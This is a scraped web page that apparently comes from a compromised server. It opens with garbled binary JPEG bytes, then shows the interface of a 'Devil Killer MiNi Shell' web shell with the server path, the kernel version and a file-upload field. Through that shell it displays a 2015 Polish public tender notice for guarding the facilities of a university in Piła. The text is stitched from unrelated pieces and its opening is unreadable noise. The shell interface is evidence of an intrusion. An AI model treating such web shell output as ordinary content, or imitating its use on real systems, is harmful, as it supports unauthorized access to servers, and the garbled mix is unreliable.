JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150624/154430-N-2015.html

<p class="kh_header"><b>Piła: Usługi w zakresie dozoru obiektów przy ul. Podchorążych 10 i ul. Żeromskiego 14 - Dom Studenta</b><br>
<b>Numer ogłoszenia: 154430 - 2015; data zamieszczenia: 24.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa , ul. Podchorążych 10, 64-920 Piła, woj. wielkopolskie, tel. 067 3522632, faks 067 3522609.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie dozoru obiektów przy ul. Podchorążych 10 i ul. Żeromskiego 14 - Dom Studenta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług w zakresie dozoru obiektów przy ul. Podchorążych 10  i ul. Żeromskiego 14 polegać będzie na:
1) przy ul. Podchorążych 10,  zakres obejmuje następujące czynności:
a)	wydawanie kluczy do pomieszczeń osobom upoważnionym, określonym przez Zamawiającego;
b)	odbiór kluczy;
c)	rzetelne prowadzenie czytelnej ewidencji czynności wydawania kluczy;
d)	rozkodowywanie i kodowanie budynków;
e)	udzielanie informacji na temat funkcjonowania Uczelni w zakresie uzgodnionym 
z Zamawiającym;
f)	służenie pomocą przede wszystkim studentom, wykładowcom oraz innym pracownikom Uczelni jak również osobom z zewnątrz w zakresie informacji o funkcjonowaniu PWSZ;
g)	kontrolowanie obiektu w trakcie pełnienia obowiązków służbowych celem przeciwdziałania zagrożeniu pożarowemu; dopilnowywanie zakazu palenia tytoniu na terenie PWSZ;
h)	monitoring bezpieczeństwa na terenie dozorowanego obiektu ze szczególnym uwzględnieniem przeciwdziałania ewentualnym zagrożeniom dla bezpieczeństwa osób czy dewastacji mienia;
i)	zapewnienie płynnego wjazdu i wyjazdu pojazdów z Uczelni;
j)	reagowanie na wszystkie sygnały wskazujące na pojawienie się zagrożenia dla osób czy mienia;
k)	udanie się niezwłoczne do miejsca zdarzenia w przypadku wzbudzenia się sygnalizacji alarmowej systemu sygnalizacji włamania i napadu bądź systemu przeciwpożarowego 
i zlokalizowanie przyczyny wywołania alarmu;
l)	wezwanie, za zgodą władz Uczelni,  grupy interwencyjnej Wykonawcy w przypadku stwierdzenia aktów wandalizmu, chuligaństwa lub stwierdzenia innego zagrożenia osób 
i mienia;
m)	kontrola pomieszczeń nie użytkowanych w zakresie ich zabezpieczenia                  
tj. zamknięcie okien, drzwi, wyłączenie wszelkich urządzeń elektrycznych, identyfikacja ewentualnych zagrożeń z tytułu złego działania wszelkich instalacji;
n)	przyjmowanie zgłoszeń napraw, awarii czy usterek od pracowników Uczelni              
i przekazywanie zgłoszeń zgodnie z procedurą zgłaszania usterek do odpowiednich służb;
o)	prowadzenie Książki Służby Portierni oraz Książki Depozytu Sprzętu Dydaktycznego;
p)	utrzymywanie porządku w pomieszczeniach portierni i na zewnątrz budynku przed portiernią (odśnieżanie, zgodnie z rejonem wyznaczonym przez Zamawiającego);
q)	przeglądanie, każdorazowo podczas obejmowania dyżuru w godzinach rannych i po dniach świątecznych zapisu wydarzeń zarejestrowanych w rejestratorze systemu monitorującego 
(z wyjątkiem dni, w których był dyżur nocny), a w przypadku stwierdzenia nietypowego zdarzenia przekazanie informacji pełnomocnikowi ochrony bądź Zastępcy Kanclerza - Kierownikowi Działu Administracyjno - Gospodarczego Uczelni;
r)	przyjmowanie w depozyt od wykładowców wyposażenia niezbędnego do prowadzenia zajęć dydaktycznych (np.: projektor multimedialny, laptop, rzutnik)  w przypadku niemożliwości zabezpieczenia tego wyposażenia w pomieszczeniach Instytutu lub Studium i wydawanie tylko osobom upoważnionym przez zdającego;
s)	kontrolowanie, czy nikt nie wywozi przedmiotów stanowiących własność PWSZ, żądanie zezwolenia osoby odpowiedzialnej materialnie za wywiezienie danego przedmiotu;
t)	kontrola oddawania kluczy oraz zgłoszenie administracji PWSZ nieprawidłowości w tym zakresie;
u)	wydawanie i przyjmowanie kluczy do pokoi gościnnych hotelu zgodnie                      
z dostarczonym przez Zamawiającego grafikiem obciążenia pokoi, oraz wydawanie druków dotyczących płatności za noclegi (w okresie, gdy hotel jest czynny);
v)	ponoszenie pełnej odpowiedzialności za przechowywanie zdanych kluczy do portierni;
w)	przeprowadzanie obchodów terenu całego obiektu przynajmniej 3 razy w godzinach nocnych, po uprzednim zamknięciu drzwi do portierni;
x)	przestrzeganie zakazu wglądu osób postronnych do urządzeń odczytu z monitoringu; 
y)	przestrzeganie zakazu przebywania  osób postronnych  w portierni;
z)	dozorujący ponosi pełną odpowiedzialności za przechowywanie zdanych kluczy do recepcji, dozorującego obowiązuje zakaz snu podczas wykonywania czynności służbowych. 
2)  przy ul. Żeromskiego 14 zakres czynności obejmuje:
a)	kontrolę wszystkich osób wchodzących na teren Domu Studenta  (DS), a w szczególności:
-	sprawdzanie kart mieszkańców;
-	przeprowadzanie szczegółowej kontroli osób wchodzących do DS i wychodzących  z Domu Studenta po godz. 22.00;
-	sprawdzanie, czy osoby trzecie przebywające w DS po godz. 22.00 posiadają ważną zgodę na dłuższy pobyt podpisaną przez kierownika DS, lub upoważnioną przez niego osobę,
-	kontrolowanie osób wychodzących, a w przypadku, gdy nie ma pewności czy dana osoba jest mieszkańcem, należy tą osobę zatrzymać i wylegitymować;
-	osoby spoza DS pozostawiają dokument tożsamości, który należy zwrócić przy opuszczeniu budynku przez daną osobę;
b)	monitoring bezpieczeństwa na terenie dozorowanego obiektu ze szczególnym uwzględnieniem przeciwdziałania ewentualnym zagrożeniom dla bezpieczeństwa osób czy mienia;
c)	wydawanie kluczy do segmentów mieszkalnych tylko za okazaniem aktualnej karty mieszkańca;
d)	kontrolowanie czy nikt nie wynosi przedmiotów stanowiących własność PWSZ, żądanie zezwolenia osoby materialnie odpowiedzialnej za wyniesienie danego przedmiotu;
e)	prowadzenie ewidencji wydanych kluczy ogólnego użytku (świetlica, pokój nauki);
f)	przeprowadzanie kontroli i rejestrowanie w książce rejestrów faktu nie zdania kluczy ogólnego użytku oraz zgłoszenie administracji Domu Studenta;
g)	przeprowadzanie obchodu całego budynku w godzinach nocnych, (co najmniej 3 razy), po uprzednim zamknięciu drzwi wejściowych;
h)	informowanie kierownika DS o wszystkich przypadkach naruszenia ciszy nocnej poprzez sporządzenie odpowiedniej notatki;
i)	przestrzeganie zakazu przebywania osób postronnych na portierni;
j)	przyjmowanie i rozdzielanie korespondencji oraz przesyłek pocztowych;
k)	odbieranie i łączenie służbowych rozmów telefonicznych a w pilnych i nagłych przypadkach proszenie do telefonu mieszkańców DS lub przekazywanie krótkiej informacji od osoby dzwoniącej;
l)	przyjmowanie opłat za pokoje hotelowe (obsługa kasy fiskalnej), wydawanie pościeli, rozliczanie się;
m)	dopilnowywanie zakazu palenia tytoniu na terenie DS;
n)	wezwanie, za zgodą władz Uczelni, grupy interwencyjnej Wykonawcy
w przypadku stwierdzenia aktów wandalizmu, chuligaństwa lub stwierdzenia innego zagrożenia osób i dewastacji mienia;
o)	przestrzeganie zakazu wglądu osób postronnych do urządzeń odczytu z monitoringu;
p)	dozorujący ponosi pełną odpowiedzialności za przechowywanie zdanych kluczy do recepcji;
q)	dozorującego obowiązuje zakaz snu podczas wykonywania czynności służbowych. 
Osoby wykonujące czynności określone w ust. 1 mają obowiązek:
1)	być ubrane w jednorodne uniformy;
2)	posiadać identyfikator Wykonawcy noszony w widocznym miejscu;
3)	charakteryzować się wysokim poziomem kultury osobistej dostosowanej do poziomu instytucji dozorowanej;
4)	dochować poufności wszystkich informacji powziętych w trakcie wykonywania pracy; 
5)	posiadać w wyposażeniu  środek łączności (telefon komórkowy), umożliwiający łączność  
z wybranymi numerami, ze strony Wykonawcy i ze strony Zamawiającego; 
Osoby wykonujące czynności określone wyżej:
1)	nie mogą być  skazane prawomocnym wyrokiem za przestępstwo umyślne;
2)	muszą mieć pełną zdolność do czynności prawnych, stwierdzoną własnym oświadczeniem;
3)	posiadać zdolność fizyczną i psychiczną do wykonywania zadań;
4)	mieć ukończone 21 lat.
Wykonawca, w czasie wykonywania zamówienia będzie zobowiązany na wezwanie Zamawiającego   świadczyć  usługę   zabezpieczenia  ochrony  imprezy masowej - kulturalnej  typu Juwenalia lub innej, zgodnie z ustawą z dnia 20 marca 2009 roku o bezpieczeństwie imprez masowych (Dz.U. z 2009 Nr 62, poz. 504 z późn. zm.) oraz będzie czynnie uczestniczył w opracowaniu dokumentacji bezpieczeństwa imprezy  masowej. Czas trwania imprezy masowej: maksymalnie dwa dni, minimum 11 godzin dziennie, przewidywana  liczba uczestników (nie mniej jak 2000 osób dziennie). Liczba służby porządkowej i służby informacyjnej winna wynosić min. 27 osób na zabezpieczenie imprezy dziennie - lub dostosowana do ilości osób, które mogą być obecne na imprezie oraz  wielkości obiektu zgodnie z ustawą o bezpieczeństwie imprez masowych. Ponadto Wykonawca zabezpieczy ochronę sceny z wyposażeniem i namiotów organizatora w przerwie imprezy, w godzinach nocnych od godz. 0:00 do godz. 14:00 (14 h). Impreza masowa może się odbywać  na terenie ogólnodostępnym z udziałem ludności miasta Piły. Ogólna liczba godzin ochrony  imprezy masowej 
w okresie od  dnia  1 sierpnia 2015 r. do dnia  31 lipca 2016 r.  wynosi  608 h. Zamawiający  podał  szacunkowe dane,  Wykonawca obciąży go  za rzeczywiste wykorzystane godziny ochrony (ilość dni imprezy pomnożona przez ilość godzin  pomnożona przez ilość osób pomnożona przez stawkę za 1 h ochrony). W przypadku, gdy w czasie wykonywania usługi Zamawiający nie skorzysta 
z zabezpieczenia  ochrony imprezy  masowej -  kulturalnej  typu Juwenalia lub innej,   Wykonawcy nie przysługuje z tego tytułu  żadne wynagrodzenie. Osoby wykonujące czynności przy usłudze zabezpieczenia imprezy masowej mają obowiązek spełniać wymagania określone powyżej oraz dodatkowo:
a.	Kierownik do spraw bezpieczeństwa, członkowie służby porządkowej, członkowie służby informacyjnej muszą mieć ukończone odpowiednio szkolenia zgodnie z Rozporządzeniem Rady Ministrów  z dnia 30 sierpnia 2011 r. w sprawie wymogów, jakie powinni spełniać kierownik do spraw bezpieczeństwa, służby porządkowe i służby informacyjne (Dz. U. z 2011r.  Nr 183., poz. 1087),
b.	być ubrane w  jednolity i umożliwiający identyfikację ubiór opatrzony na plecach odblaskowym napisem - SŁUŻBA PORZĄDKOWA lub SŁUŻBA INFORMACYJNA,
c.	przeglądu odzieży osoby uczestniczącej w imprezie masowej może dokonywać członek służby porządkowej lub członek służby informacyjnej tej samej płci, co osoba kontrolowana.
Wykonawca zobowiązany jest przeprowadzać kontrolę pracy pracowników przynajmniej dwa razy w tygodniu, o różnej porze doby, oraz codziennie przez kierownika ochrony obiektów. Z kontroli Wykonawca zobowiązany jest w dniu następnym przedstawić informację  jednej z osób  upoważnionych  przez Zamawiającego.
Wykonawca w trakcie trwania umowy, w terminie określonym przez Zamawiającego, na własny koszt zabezpieczy pomieszczenie dla portierów - kontener biurowy (kiosk) nadający się do wykorzystania przez pracowników dozoru jako stróżówka i portiernia, wyposażony w instalację elektryczną, oświetlenie i ogrzewanie elektryczne, o izolowanych ścianach i oknach z roletami bądź kratami. Kontener Wykonawca ustawi na posesji przy ul. Podchorążych 10 w ustalonym z Zamawiającym miejscu. Pomieszczenie powinno pomieścić na ścianach tablice  z kluczami użytku bieżącego 
o wymiarach 153x51x10cm - 2 szt., 132x20x10cm - 1 szt., 132x24x10cm - 1 szt., 104x24x10cm - 
1 szt., 91x32x10cm - 1 szt. i umożliwiać wydawanie kluczy dla pracowników Uczelni. Ponadto Zamawiający przekaże Wykonawcy jako wyposażenie kontenera szafę pancerną, szafę ubraniową, biurko z krzesłem oraz  zabezpieczy łączność stacjonarną z kontenerem. Wykonawca w kontenerze zamontuje na własny koszt podlicznik energii elektrycznej, na podstawie, którego będzie obciążany przez Zamawiającego za zużytą energię elektryczną.
Wykonawca zobowiązuje się do wykonywania usługi w ustalonym terminie również  w przypadku wprowadzenia w Rzeczpospolitej Polskiej stopni alarmowych lub wprowadzenia wyższych stanów gotowości obronnej państwa.
Suma godzin w czasie trwania umowy stanowi łącznie:
1) przy ul. Podchorążych 10 - 5.654 h  do wykorzystania  według poniższego zestawienia:
2) przy ul. Żeromskiego 14 - Dom Studenta -  8.784 h
01 sierpień 2015 - 31 lipiec 2016 - dozór obiektu przez 24 h na dobę - 8 .784 godzin,
Ogólna liczba godzin dozoru na obiektach PWSZ przy ul. Podchorążych 10 i ul. Żeromskiego 14 
w okresie od  dnia  1 sierpnia 2015 r. do dnia  31 lipca 2016 r.  wynosi  14.438 h.
Wykonawca jest zobowiązany do zabezpieczenia odpowiedniej ilości osób, która pozwoli na sprawne wykonywanie zadań w zakresie dozoru obiektów, jednak nie mniej niż z czterema osobami w obiekcie  przy ul. Żeromskiego 14 i nie mniej niż  trzema osobami w obiekcie przy ul. Podchorążych 10. Obiekty PWSZ posiadają zainstalowane systemy telewizji przemysłowej. Dodatkowo obiekt PWSZ przy 
ul. Podchorążych 10 posiada zabezpieczenie wszystkich budynków w formie Systemu Sygnalizacji Włamania i Napadu. Zamawiający udostępni  Wykonawcy wyżej wymienione systemy, które  ułatwiają dozór obiektów.
Wykonawca  musi zapewnić grupę interwencyjną, zdolną do działania w wymaganym czasie na terenie miasta Piły. Wykonawca powinien dysponować własną grupą interwencyjną lub zapewnić ją przez podwykonawców. Osoby wchodzące w skład grupy interwencyjnej,  którą dysponuje Wykonawca powinny spełniać wymagania zawarte w ustawie z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. z 2005,  Nr 145, poz. 1221 z późn. zm.).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa art. 67 ust.1 pkt 6 Ustawy, polegających na zwiększeniu ilości godzin dozoru</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 98.34.11.20-2, 98.34.11.30-5, 98.34.11.40-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają ważną koncesję MSWiA. Na dowód tego Wykonawcy załączają Koncesję MSWiA uprawniająca do wykonywania działalności związanej z ochroną i dozorem osób i mienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy w ciągu ostatnich 3 lat, byli głównym wykonawcą przy realizacji, co najmniej dwóch usług odpowiadających swoim rodzajem co przedmiot niniejszego przetargu i wartością min. 120.000 zł brutto każda; powyższe usługi winny być zakończone. Zamawiający za usługi odpowiadające swoim rodzajem co przedmiot zamówienia będzie traktował przeprowadzenie usług dozoru obiektów. Na dowód tego Wykonawcy składają wykaz wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania 
i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy i usługi zostały wykonane należycie, stanowiący załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia warunku udziału w postępowaniu, Wykonawca składa w tym zakresie oświadczenie o spełnieniu warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia warunku udziału w postępowaniu, Wykonawca składa w tym zakresie oświadczenie o spełnieniu warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia warunku udziału w postępowaniu, Wykonawca składa w tym zakresie oświadczenie o spełnieniu warunku udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz ofertowy (załącznik nr 1, Część II SIWZ). Pełnomocnictwo dla reprezentanta - dotyczy podmiotów występujących wspólnie (np. konsorcja 
i spółki cywilne). Wypełniony formularz cenowy (załącznik nr 5, Część III SIWZ). Parafowany projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas dojazdu grupy interwencyjnej - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
